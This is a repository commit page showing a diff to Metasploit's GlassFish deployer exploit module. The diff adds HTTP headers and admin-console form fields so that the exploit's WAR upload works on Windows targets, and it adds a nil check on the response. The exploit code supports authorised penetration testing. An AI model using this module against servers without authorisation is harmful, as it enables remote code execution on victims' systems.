dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Land #7255, Fix issue causing Glassfish to fail uploading to Windows targets.

This commit is contained in:
James Barnett 2016-09-14 12:57:41 -05:00
parent 8533e6c5fd 445a43bd97
commit 6509b34da1
No known key found for this signature in database
GPG Key ID: 647983861A4EC5EA
1 changed files with 38 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
modules/exploits/multi/http/glassfish_deployer.rb
View File

@ -67,6 +67,10 @@ class MetasploitModule < Msf::Exploit::Remote
headers = {}
headers['Cookie'] = "JSESSIONID=#{session}" unless session.blank?
headers['Content-Type'] = ctype if ctype
headers['Connection'] = 'keep-alive'
headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
headers['Accept-Language'] = 'en-US,en;q=0.5'
headers['Accept-Encoding'] = 'gzip, deflate, br'
res = send_request_raw({
'uri' => path,
@ -475,6 +479,39 @@ class MetasploitModule < Msf::Exploit::Remote
format(boundary,"form:war:psection:enableProp:sun_checkbox" + id7.to_s,"true"),
format(boundary,"form:war:psection:enableProp:sun_checkbox" + id8.to_s,"true"),
format(boundary,"form:war:psection:enableProp:sun_checkbox" + id9.to_s,"true"),
format(boundary,"form:other:psection:descriptionProp:description", ""),
format(boundary,"form:other:psection:librariesProp:library", ""),
format(boundary,"form:other:psection:deploymentOrder:deploymentOrder", ""),
format(boundary,"form:other:psection:implicitCdi:implicitCdi", "true"),
format(boundary,"form:other:psection:enableProp:sun_checkbox44","true"),
format(boundary,"form:war:psection:enableProp:sun_checkbox42","true"),
format(boundary,"form:other:psection:vsProp:vs",""),
format(boundary,"form:rar:psection:implicitCdi:implicitCdi","true"),
format(boundary,"form:rar:psection:deploymentOrder:deploymentOrder",""),
format(boundary,"form:rar:psection:enableProp:sun_checkbox40","true"),
format(boundary,"form:other:psection:nameProp:appName", app_base),
format(boundary,"form:rar:psection:nameProp:appName", app_base),
format(boundary,"form:jar:psection:nameProp:appName", app_base),
format(boundary,"form:ear:psection:nameProp:appName", app_base),
format(boundary,"form:ear:psection:descriptionProp:description",""),
format(boundary,"form:jar:psection:deploymentOrder:deploymentOrder", ""),
format(boundary,"form:jar:psection:implicitCdi:implicitCdi","true"),
format(boundary,"form:ear:psection:jw:jwc","true"),
format(boundary,"form:ear:psection:vsProp:vs",""),
format(boundary,"form:appClient:psection:deploymentOrder:deploymentOrder",""),
format(boundary,"form:jar:psection:enableProp:sun_checkbox38","true"),
format(boundary,"form:jar:psection:descriptionProp:description", ""),
format(boundary,"form:ear:psection:implicitCdi:implicitCdi","true"),
format(boundary,"form:appClient:psection:implicitCdi:implicitCdi","true"),
format(boundary,"form:ear:psection:enableProp:sun_checkbox36","true"),
format(boundary,"form:war:psection:deploymentOrder:deploymentOrder",""),
format(boundary,"form:jar:psection:librariesProp:library",""),
format(boundary,"form:appClient:psection:jw:jwt","true"),
format(boundary,"form:ear:psection:librariesProp:library", ""),
format(boundary,"form:sheet1:sun_propertySheetSection23:type:appType","war"),
format(boundary,"form:ear:psection:deploymentOrder:deploymentOrder",""),
format(boundary,"form:rar:psection:descriptionProp:description",""),
format(boundary,"form:war:psection:implicitCdi:implicitCdi","true"),
format(boundary,"form:war:psection:librariesProp:library"),
format(boundary,"form:war:psection:descriptionProp:description"),
format(boundary,"form_hidden","form_hidden"),
@ -499,7 +536,6 @@ class MetasploitModule < Msf::Exploit::Remote
end
def get_viewstate(body)
@vewstate ||= lambda {
noko = Nokogiri::HTML(body)
inputs = noko.search('input')
hidden_inputs = []
@ -511,7 +547,6 @@ class MetasploitModule < Msf::Exploit::Remote
end
''
}.call
end
#
@ -587,7 +622,7 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_glassfish_request(path, @verbs['POST'], session, post_data, ctype)
# Print upload result
if res.code == 302
if res && res.code == 302
print_status("Successfully uploaded")
else
print_error("Error uploading #{res.code}")